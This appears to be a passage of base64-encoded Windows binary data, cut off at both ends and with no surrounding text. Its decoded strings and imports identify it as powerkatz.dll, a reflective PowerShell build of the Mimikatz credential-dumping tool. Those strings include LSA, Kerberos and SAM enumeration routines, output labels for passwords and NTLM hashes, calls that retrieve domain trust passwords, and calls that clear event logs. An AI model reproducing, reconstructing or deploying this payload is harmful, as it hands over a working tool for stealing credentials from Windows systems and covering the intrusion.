AgAAAAPABuAG8AIABzAGkAegBlACwAIABiAHUAZgBmAGUAcgAgAGkAcwAgAGkAbgBjAG8AcgByAGUAYwB0AD4AAAAAACUAdwBaAAkAJQB3AFoACQAAAAAACgAJACAAKgAgAFUAcwBlAHIAbgBhAG0AZQAgADoAIAAlAHcAWgAKAAkAIAAqACAARABvAG0AYQBpAG4AIAAgACAAOgAgACUAdwBaAAoACQAgACoAIABQAGEAcwBzAHcAbwByAGQAIAA6ACAAAAAAAEwAVQBJAEQAIABLAE8ACgAAAAAACgAJACAAKgAgAFIAbwBvAHQASwBlAHkAIAAgADoAIAAAAAAACgAJACAAKgAgACUAMAA4AHgAIAA6ACAAAAAAAAoACQAgACAAIAAqACAATABTAEEAIABJAHMAbwBsAGEAdABlAGQAIABEAGEAdABhADoAIAAlAC4AKgBTAAAAAAAKAAkAIAAgACAAIAAgAFUAbgBrAC0ASwBlAHkAIAAgADoAIAAAAAAACgAJACAAIAAgACAAIABFAG4AYwByAHkAcAB0AGUAZAA6ACAAAAAAAAoACQAJACAAIAAgAFMAUwA6ACUAdQAsACAAVABTADoAJQB1ACwAIABEAFMAOgAlAHUAAAAKAAkACQAgACAAIAAwADoAMAB4ACUAeAAsACAAMQA6ADAAeAAlAHgALAAgADIAOgAwAHgAJQB4ACwAIAAzADoAMAB4ACUAeAAsACAANAA6ADAAeAAlAHgALAAgAEUAOgAAAAAALAAgADUAOgAwAHgAJQB4AAAAAAAKAAkAIAAgACAAKgAgAHUAbgBrAEQAYQB0AGEAMQAgADoAIAAAAAAACgAJACAAIAAgACAAIAB1AG4AawBEAGEAdABhADIAIAA6ACAAAAAAAAoACQAgAFsAJQAwADgAeABdAAAAZABwAGEAcABpAHMAcgB2AC4AZABsAGwAAAAAAAkAIABbACUAMAA4AHgAXQAKAAkAIAAqACAARwBVAEkARAAgACAAIAAgACAAIAA6AAkAAAAKAAkAIAAqACAAVABpAG0AZQAgACAAIAAgACAAIAA6AAkAAAAKAAkAIAAqACAATQBhAHMAdABlAHIASwBlAHkAIAA6AAkAAAAKAAkAIAAqACAAcwBoAGEAMQAoAGsAZQB5ACkAIAA6AAkAAAAKAAkASwBPAAAAAABrAGUAcgBiAGUAcgBvAHMALgBkAGwAbAAAAAAAVABpAGMAawBlAHQAIABHAHIAYQBuAHQAaQBuAGcAIABTAGUAcgB2AGkAYwBlAAAAQwBsAGkAZQBuAHQAIABUAGkAYwBrAGUAdAAgAD8AAABUAGkAYwBrAGUAdAAgAEcAcgBhAG4AdABpAG4AZwAgAFQAaQBjAGsAZQB0AAAAAAAKAAkARwByAG8AdQBwACAAJQB1ACAALQAgACUAcwAAAAoACQAgACoAIABLAGUAeQAgAEwAaQBzAHQAIAA6AAoAAAAAAGQAYQB0AGEAIABjAG8AcAB5ACAAQAAgACUAcAAAAAAACgAgACAAIABcAF8AIAAlAHMAIAAAAAAALQA+ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBlAG4AdQBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBhAGwAbABiAGEAYwBrAF8AcAB0AGgAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAoAIAAgACAAXABfACAAKgBQAGEAcwBzAHcAbwByAGQAIAByAGUAcABsAGEAYwBlACAALQA+ACAAAAAAAG4AdQBsAGwAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AawBlAHIAYgBlAHIAbwBzAF8AZQBuAHUAbQBfAHQAaQBjAGsAZQB0AHMAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAKAAkAIAAgACAATABTAEEAIABTAGUAcwBzAGkAbwBuACAASwBlAHkAIAAgACAAOgAgADAAeAAlADAAOAB4ACAALQAgACUAcwAAAAAAAAAAAFsAJQB4ADsAJQB4AF0ALQAlADEAdQAtACUAdQAtACUAMAA4AHgALQAlAHcAWgBAACUAdwBaAC0AJQB3AFoALgAlAHMAAAAAAFsAJQB4ADsAJQB4AF0ALQAlADEAdQAtACUAdQAtACUAMAA4AHgALgAlAHMAAAAAAGwAaQB2AGUAcwBzAHAALg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DU////AAAAAP7///8AAAAAiVEFEAAAAAD+////AAAAANT///8AAAAA/v///wAAAACZhAUQAAAAAP7///8AAAAAxP///wAAAAD+////AAAAAEKEBRAAAAAAAAAAABWEBRD+////AAAAAND///8AAAAA/v///wAAAACQhQUQAAAAAP7///8AAAAA0P///wAAAAD+////AAAAAGeHBRAAAAAA5P///wAAAADU////AAAAAP7///8AAAAAyx0GEAAAAACzHQYQwx0GEP7///8AAAAA1P///wAAAAD+////AAAAAP8kBhAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAUCUGEAAAAADk////AAAAANT///8AAAAA/v///ygqBhAsKgYQAAAAAP7///8AAAAA2P///wAAAAD+////AAAAAGQ3BhAAAAAA/v///wAAAADY////AAAAAP7///8AAAAAcDYGEAAAAAD+////AAAAANj///8AAAAA/v///wAAAADRNgYQAAAAAP7///8AAAAA2P///wAAAAD+////AAAAABw3BhAAAAAA/v///wAAAADY////AAAAAP7///8AAAAAYEgGEAAAAAD+////AAAAANT///8AAAAA/v///wAAAAAfSgYQAAAAAP7///8AAAAA0P///wAAAAD+////AAAAAClSBhAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAmVMGEAAAAAD+////AAAAAMz///8AAAAA/v///wAAAACLWgYQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAADldBhAAAAAA/v///wAAAADU////AAAAAP7///8AAAAA3l4GEAAAAAD+////AAAAAMT///8AAAAA/v///wAAAAAPYwYQAAAAAP7///8AAAAAzP///wAAAAD+////AAAAACNhBhAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAiYcGEAAAAAD+////AAAAANj///8AAAAA/v///wAAAAA6ggYQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAB2QBhAAAAAA5P///wAAAAC0////AAAAAP7///8AAAAAIZMGEAAAAAD+////AAAAANT///8AAAAA/v///wAAAAB0kAYQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAOmZBh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9weVNpZACdAUxzYUNsb3NlAAC9AUxzYU9wZW5Qb2xpY3kAxQFMc2FRdWVyeUluZm9ybWF0aW9uUG9saWN5AIMAQ3JlYXRlV2VsbEtub3duU2lkAAB8AENyZWF0ZVByb2Nlc3NBc1VzZXJXAAB9AENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XAG4CUmVnUXVlcnlWYWx1ZUV4VwAAUgJSZWdFbnVtVmFsdWVXAGECUmVnT3BlbktleUV4VwB+AlJlZ1NldFZhbHVlRXhXAABPAlJlZ0VudW1LZXlFeFcAaAJSZWdRdWVyeUluZm9LZXlXAAAwAlJlZ0Nsb3NlS2V5AO0CU3lzdGVtRnVuY3Rpb24wMzIAKQJRdWVyeVNlcnZpY2VTdGF0dXNFeAAA+wFPcGVuU2VydmljZVcAAMkCU3RhcnRTZXJ2aWNlVwBcAENvbnRyb2xTZXJ2aWNlAADaAERlbGV0ZVNlcnZpY2UA+QFPcGVuU0NNYW5hZ2VyVwAAVwBDbG9zZVNlcnZpY2VIYW5kbGUAAGwAQ29udmVydFNpZFRvU3RyaW5nU2lkVwAAgAFJc1RleHRVbmljb2RlAFoBR2V0VG9rZW5JbmZvcm1hdGlvbgCPAUxvb2t1cEFjY291bnROYW1lVwAAkQFMb29rdXBBY2NvdW50U2lkVwD3AU9wZW5Qcm9jZXNzVG9rZW4AAHQAQ29udmVydFN0cmluZ1NpZFRvU2lkVwAAqwFMc2FGcmVlTWVtb3J5ANMCU3lzdGVtRnVuY3Rpb24wMDYAvABDcnlwdEVudW1Qcm92aWRlclR5cGVzVwC+AENyeXB0RW51bVByb3ZpZGVyc1cAxwBDcnlwdEdldFVzZXJLZXkA9gFPcGVuRXZlbnRMb2dXAFMAQ2xlYXJFdmVudExvZ1cAAEMBR2V0TnVtYmVyT2ZFdmVudExvZ1JlY29yZHMAACcCUXVlcnlTZXJ2aWNlT2JqZWN0U2VjdXJpdHkAAEMAQnVpbGRTZWN1cml0eURlc2NyaXB0b3JXAAAgAUZyZWVTaWQAvwJTZXRTZXJ2aWNlT2JqZWN0U2VjdXJpdHkAACAAQWxsb2NhdGVBbmRJbml0aWFsaXplU2lkAACBAENyZWF0ZVNlcnZpY2VXAADmAlN5c3RlbUZ1bmN0aW9uMDI1AMwBTHNhUmV0cmlldmVQcml2YXRlRGF0YQAAvwFMc2FPcGVuU2VjcmV0AMkBTHNhUXVlcnlUcnVzdGVkRG9tYWluSW5mb0J5TmFtZQDGAUxzYVF1ZXJ5U2VjcmV0AADOAlN5c3RlbUZ1bmN0aW9uMDAxANICU3lzdGVtRnVuY3Rpb24wMDUAVwFHZXRTaWRTdWJBdXRob3JpdHkAANoCU3lzdGVtRnVuY3Rpb24wMTMAWAFHZXRTaWRTdWJBdXRob3JpdHlDb3VudACqAUxzYUVudW1lcmF0ZVRydXN0ZWREb21haW5zRXgAAJcBTG9va3VwUHJpdmlsZWdlVmFsdWVXAIYBSXNWYWxpZFNpZAAA/AFPcGVuVGhyZWFkVG9rZW4A3wBEdXBsaWNhdGVUb2tlbkV4AABRAENoZWNrVG9rZW5NZW1iZXJzaGlwAADBAlNldFRocmVhZFRva2VuAACMAENyZWRGcmVlAACJAENyZWRFbnVtZXJhdGVXAABBRFZBUEkzMi5kbGwAAAgAQ2VydEFkZEVuY29kZWRDZXJ0aWZpY2F0ZVRvU3RvcmUAAEAAQ2VydEZyZWVDZXJ0aWZpY2F0ZUNvbnRleHQAABIAQ2VydENsb3NlU3RvcmUAABYBUEZYRXhwb3J0Q2VydFN0b3JlRXgAAGoAQ2VydFNldENlcnRpZmljYXRlQ29udGV4dFByb3BlcnR5AFcAQ2VydE9wZW5TdG9yZQDbAENyeXB0VW5wcm90ZWN0RGF0YQAAfQBDcnlwdEJpbmFyeVRvU3RyaW5nVwAA2QBDcnlwdFN0cmluZ1RvQmluYXJ5VwAAvQBDcnlwdFByb3RlY3REYXRhAAB6AENyeXB0QWNxdWlyZUNlcnRpZmljYXRlUHJpdmF0ZUtleQCOAENyeXB0RXhwb3J0UHVibGljS2V5SW5mbwAALwBDZXJ0RW51bVN5c3RlbVN0b3JlAAQAQ2VydEFkZENlcnRpZmljYXRlQ29udGV4dFRvU3RvcmUAANIAQ3J5cHRTaWduQW5kRW5jb2RlQ2VydGlmaWNhdGUALABDZXJ0RW51bUNlcnRpZmljYXRlc0luU3RvcmUAhgBDcnlwdEVuY29kZU9iamVjdAA1AENlcnRGaW5kQ2VydGlmaWNhdGVJblN0b3JlAABLAENlcnRHZXROYW1lU3RyaW5nVwAARgBDZXJ0R2V0Q2VydGlmaWNhdGVDb250ZXh0UHJvcGVydHkAQ1JZUFQzMi5kbGwABgBDRExvY2F0ZUNoZWNrU3VtAAAMAE1ENUluaXQADQBNRDVVcGRhdGUACwBNRDVGaW5hbAAABQBDRExvY2F0ZUNTeXN0ZW0ABABDREdlbmVyYXRlUmFuZG9tQml0cwAAY3J5cHRkbGwuZGxsAAAQAERzR2V0RGNOYW1lVwAAZQBOZXRBcGlCdWZmZXJGcmVlAABORVRBUEkzMi5kbGwAABAAQ29DcmVhdGVJbnN0YW5jZQAAbABDb1VuaW5pdGlhbGl6ZQAAPwBDb0luaXRpYWxpemVFeAAAb2xlMzIuZGxsAE9MRUFVVDMyLmRsbAAAcQFScGNCaW5kaW5nU2V0T3B0aW9uAF8BUnBjQmluZGluZ0Zyb21TdHJpbmdCaW5kaW5nVwAA7gFScGNTdHJpbmdCaW5kaW5nQ29tcG9zZVcAAG4BUnBjQmluZGluZ1NldEF1dGhJbmZvRXhXAADyAVJwY1N0cmluZ0ZyZWVXAAB9AE1lc0hhbmRsZUZyZWUAfABNZXNFbmNvZGVJbmNyZW1lbnRhbEhhbmRsZUNyZWF0ZQAAeQBNZXNEZWNvZGVJbmNyZW1lbnRhbEhhbmRsZUNyZWF0ZQAAXQFScGNCaW5kaW5nRnJlZQAAfgBNZXNJbmNyZW1lbnRhbEhhbmRsZVJlc2V0APMATmRyTWVzVHlwZUVuY29kZTIA8QBOZHJNZXNUeXBlRGVjb2RlMgD0AE5kck1lc1R5cGVGcmVlMgDvAE5kck1lc1R5cGVBbGlnblNpemUyAAAgAElfUnBjQmluZGluZ0lucVNlY3VyaXR5Q29udGV4dAAAlQBOZHJDbGllbnRDYWxsMgAA+wFVdWlkQ3JlYXRlAABSUENSVDQuZGxsAAA6AFBhdGhDb21iaW5lVwAAOABQYXRoQ2Fub25pY2FsaXplVwBlAFBhdGhJc1JlbGF0aXZlVwBJAFBhdGhGaW5kRmlsZU5hbWVXAFsAUGF0aElzRGlyZWN0b3J5VwAAU0hMV0FQSS5kbGwAEwBTYW1FbnVtZXJhdGVVc2Vyc0luRG9tYWluAB0AU2FtTG9va3VwTmFtZXNJbkRvbWFpbgAAHwBTYW1PcGVuRG9tYWluACEAU2FtT3BlblVzZXIAHABTYW1Mb29rdXBJZHNJbkRvbWFpbgAABwBTYW1Db25uZWN0AAAGAFNhbUNsb3NlSGFuZGxlAAAUAFNhbUZyZWVNZW1vcnkAJgBTYW1RdWVyeUluZm9ybWF0aW9uVXNlcgAgAFNhbU9wZW5Hcm91cAAAEQBTYW1FbnVtZXJhdGVEb21haW5zSW5TYW1TZXJ2ZXIAABAAU2FtRW51bWVyYXRlQWxpYXNlc0luRG9tYWluACwAU2FtUmlkVG9TaWQAHgBTYW1PcGVuQWxpYXMAABUAU2FtR2V0QWxpYXNNZW1iZXJzaGlwABIAU2FtRW51bWVyYXRlR3JvdXBzSW5Eb21haW4AABsAU2FtTG9va3VwRG9tYWluSW5TYW1TZXJ2ZXIAABoAU2FtR2V0TWVtYmVyc0luR3JvdXAAABkAU2FtR2V0TWVtYmVyc0luQWxpYXMAABgAU2FtR2V0R3JvdXBzRm9yVXNlcgBTQU1MSUIuZGxsAAAYAEZyZWVDb250ZXh0QnVmZmVyADQAUXVlcnlDb250ZXh0QXR0cmlidXRlc1cAJwBMc2FDb25uZWN0VW50cnVzdGVkACgATHNhRGVyZWdpc3RlckxvZ29uUHJvY2VzcwAmAExzYUNhbGxBdXRoZW50aWNhdGlvblBhY2thZ2UAAC0ATHNhTG9va3VwQXV0aGVudGljYXRpb25QYWNrYWdlAAAqAExzYUZyZWVSZXR1cm5CdWZmZXIAU2VjdXIzMi5kbGwABgBDb21tYW5kTGluZVRvQXJndlcAAFNIRUxMMzIuZGxsAMMBSXNDaGFyQWxwaGFOdW1lcmljVwA+AUdldEtleWJvYXJkTGF5b3V0AFVTRVIzMi5kbGwAAAUASGlkRF9HZXRIaWRHdWlkAAEASGlkRF9GcmVlUHJlcGFyc2VkRGF0YQAADABIaWREX0dldFByZXBhcnNlZERhdGEAFQBIaWRQX0dldENhcHMAAAIASGlkRF9HZXRBdHRyaWJ1dGVzAABISUQuRExMAD8BU2V0dXBEaURlc3Ryb3lEZXZpY2VJbmZvTGlzdAAAQwFTZXR1cERpRW51bURldmljZUludGVyZmFjZXMAVgFTZXR1cERpR2V0Q2xhc3NEZXZzVwAAbgFTZXR1cERpR2V0RGV2aWNlSW50ZXJmYWNlRGV0YWlsVwAAU0VUVVBBUEkuZGxsAAAqAFNDYXJkTGlzdFJlYWRlcnNXABYAU0NhcmRHZXRDYXJkVHlwZVByb3ZpZGVyTmFtZVcAJABTQ2FyZExpc3RDYXJkc1cAMwBTQ2FyZFJlbGVhc2VDb250ZXh0AAwAU0NhcmRFc3RhYmxpc2hDb250ZXh0AAoAU0NhcmREaXNjb25uZWN0ABQAU0NhcmRHZXRBdHRyaWIAABMAU0NhcmRGcmVlTWVtb3J5AAgAU0NhcmRDb25uZWN0VwBXaW5TQ2FyZC5kbGwAAFdMREFQMzIuZGxsABUAUnRsRnJlZUFuc2lTdHJpbmcAIABSdGxVbmljb2RlU3RyaW5nVG9BbnNpU3RyaW5nAAAWAFJ0bEZyZWVVbmljb2RlU3RyaW5nAAASAFJ0bERvd25jYXNlVW5pY29kZVN0cmluZwAAFABSdGxFcXVhbFVuaWNvZGVTdHJpbmcAHABSdGxJbml0VW5pY29kZVN0cmluZwAAAgBOdFF1ZXJ5T2JqZWN0ABgAUnRsR2V0Q29tcHJlc3Npb25Xb3JrU3BhY2VTaXplAAAPAFJ0bENvbXByZXNzQnVmZmVyAAUATnRRdWVyeVN5c3RlbUluZm9ybWF0aW9uAAABAE50UXVlcnlJbmZvcm1hdGlvblByb2Nlc3MAGQBSdGxHZXRDdXJyZW50UGViAAAQAFJ0bENyZWF0ZVVzZXJUaHJlYWQAFwBSdGxHVUlERnJvbVN0cmluZwAfAFJ0bFN0cmluZ0Zyb21HVUlEABoAUnRsR2V0TnRWZXJzaW9uTnVtYmVycwAADgBSdGxBcHBlbmRVbmljb2RlU3RyaW5nVG9TdHJpbmcAACIAUnRsVXBjYXNlVW5pY29kZVN0cmluZwAADQBSdGxBbnNpU3RyaW5nVG9Vbmljb2RlU3RyaW5nAAAGAE50UmVzdW1lUHJvY2VzcwAMAFJ0bEFkanVzdFByaXZpbGVnZQAACwBOdFRlcm1pbmF0ZVByb2Nlc3MAAAoATnRTdXNwZW5kUHJvY2VzcwAACABOdFNldFN5c3RlbUVudmlyb25tZW50VmFsdWVFeAAEAE50UXVlcnlTeXN0ZW1FbnZpcm9ubWVudFZhbHVlRXgAAABOdEVudW1lcmF0ZVN5c3RlbUVudmlyb25tZW50VmFsdWVzRXgAABMAUnRsRXF1YWxTdHJpbmcAAG50ZGxsLmRsbAABAElfTmV0U2VydmVyUmVxQ2hhbGxlbmdlAAAASV9OZXRTZXJ2ZXJBdXRoZW50aWNhdGUyAAACAElfTmV0U2VydmVyVHJ1c3RQYXNzd29yZHNHZXQAAG5ldGFwaTMyLmRsbAAAJQFGaWxlVGltZVRvU3lzdGVtVGltZQAAwANSZWFkRmlsZQAAJQVXcml0ZUZpbGUARANMb2NhbEFsbG9jAACPAENyZWF0ZUZpbGVXALIEU2xlZXAAAgJHZXRMYXN0RXJyb3IAAMEEVGVybWluYXRlVGhyZWFkAFIAQ2xvc2VIYW5kbGUAtQBDcmVhdGVUaHJlYWQAAEgDTG9jYWxGcmVlADkBRmluZEZpcnN0RmlsZVcAAPEBR2V0RmlsZVNpemVFeABFAU